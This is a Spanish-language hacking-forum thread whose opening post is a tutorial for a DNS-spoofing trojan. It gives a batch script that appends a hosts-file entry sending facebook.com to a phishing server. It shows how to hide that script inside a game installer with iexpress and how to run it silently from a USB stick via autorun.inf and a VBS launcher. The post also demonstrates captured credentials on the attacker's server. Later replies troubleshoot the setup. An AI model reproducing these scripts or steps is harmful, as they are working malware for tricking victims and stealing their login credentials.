Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: Muppet en Agosto 07, 2012, 03:01:11 AM

Título: Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: Muppet en Agosto 07, 2012, 03:01:11 AM
DNS Spoofing Malware

Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash

El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro

Primer Caso:

Ingenieria Social.

Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)

Código [Seleccionar]

@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit


En mi caso direccionare facebook.com a un sitio Fake (Phishing)
Código [Seleccionar]

DNSSPOOF.bat:

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.

(http://i48.tinypic.com/2eygqwy.jpg)

Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)

Agregamos los 2 Archivos:

(http://i48.tinypic.com/4uuhvq.jpg)

aca la parte importante.


Install Program: Pondremos Packman.exe

Post Intall Command: Pondremos DNSSPOOF.bat

(http://i49.tinypic.com/21nqkwh.jpg)

En Show Windows ponemos Hidden

En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User

y lo Guardamos con el Nombre Packman2.exe

En Configure Restart ponemos NO RESTART

Esperamos q Termine la Comprecion

Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)

(http://i48.tinypic.com/zyhsnd.jpg)

Ahora ejecutamos para la prueba:

(http://i46.tinypic.com/3518g2c.jpg)

vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.

(http://i46.tinypic.com/34dpijb.jpg)

borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas :)

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.

Segundo caso:

Ejecutando Archivo desde un PenDrive:

crearemos un archivo autorun.inf que contenga:
Código [Seleccionar]

[autorun]

action=Open Files On Folder
icon=USB.ico

shellexecute=Start.vbs

y un Start.vbs que contenga:
Código [Seleccionar]

set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide

Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive

(http://i50.tinypic.com/n1e8tt.png)

Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts

Veamos como funciona:

Visitamos facebook.com luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a www.facebook.com (que realmente es un sitio Phishing)
Agregamos de Informacion User: [email protected] pass: Owned

(http://i45.tinypic.com/34o5v2x.png)

y le damos Entrar, nos redirecciona a www.facebook.com (sitio real de facebook)

vamos a nuestro servidor y revisamos el archivo log.txt

(http://i49.tinypic.com/2v8ft4o.png)

Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker
Título: Re:Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: Stiuvert en Agosto 07, 2012, 05:35:13 AM
Muy bueno "hdbreaker" había mucha gente que preguntaba sobre DNS Spoofing, espero que esto les sirva porque esta muy bien explicado ;)



Saludos
Título: Re:Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: zoro248 en Agosto 07, 2012, 12:33:54 PM
Excelente tutorial, lo tratare de hacer haber si me funciona..

No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE

...Saludos --->
Título: Re:Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: Muppet en Agosto 07, 2012, 09:14:27 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Excelente tutorial, lo tratare de hacer haber si me funciona..

No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE

...Saludos --->
Tal ves tu problema radique en esta linea del .bat

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts

el IP debe ser de un Servidor Privado Propio, o uno personal montado con un IP Estatica, si no cuentas con esto, prueba redireccionar a una IP LOCAL

q el archivo localhost quede:

127.0.0.1 www.google.com

esto lograra q al visitar www.google.com se redireccione a 127.0.0.1

sino otra prueba q puedes hacer es cambiar www.google.com por el ip de facebook.com

hosts:

66.220.149.11 www.google.com

al visitar www.google.com seras redireccionado a facebook
Título: Re:Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: zoro248 en Agosto 07, 2012, 10:30:10 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Excelente tutorial, lo tratare de hacer haber si me funciona..

No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE

...Saludos --->
Tal ves tu problema radique en esta linea del .bat

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts

el IP debe ser de un Servidor Privado Propio, o uno personal montado con un IP Estatica, si no cuentas con esto, prueba redireccionar a una IP LOCAL

q el archivo localhost quede:

127.0.0.1 www.google.com

esto lograra q al visitar www.google.com se redireccione a 127.0.0.1

sino otra prueba q puedes hacer es cambiar www.google.com por el ip de facebook.com

hosts:

66.220.149.11 www.google.com

al visitar www.google.com seras redireccionado a facebook

Muchas gracias por la respuesta, seguire checando, te aviso que tal


...Saludos --->
Título: Re:Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: zoro248 en Agosto 12, 2012, 09:43:36 PM
Sigue sin funcionar, hizo el ejemplo que dijiste con ip local, pero ni asi funciona, ya lo probe con win 7 y tampoco..


..Saludos espero tu respuesta --->
Título: Re:Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: Muppet en Agosto 13, 2012, 02:18:37 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Sigue sin funcionar, hizo el ejemplo que dijiste con ip local, pero ni asi funciona, ya lo probe con win 7 y tampoco..


..Saludos espero tu respuesta --->

Fijate luego de modificar el archivo host, en reiniciar la pc y matar el proceso explorer.exe y volverlo a ejecutar
Título: Re:Dns Spoof Modificando Archivo hosts con "Malware"
Publicado por: s00rk en Agosto 13, 2012, 02:40:28 AM
No entiendo porque matar el explorer.exe o.O! nunca lo he tenid que hacer a la hora de modificar el archivo Host, aun usando Win XP o Win7 me ha funcionado sin matar algo hehe, sobre el error de zoro quiero creer que tienes un servidor web en tu PC, asi como tambien si usas un router las PC que esten conectadas a ese router en la IP debe ser la lan tuya, en cambio si quieres hacerlo a una PC fuera deberas usar tu IP publica o usar no-ip(esto la verdad nose si funciona ya que nunca lo he usado hehe)
Sólo texto | Texto con Imágenes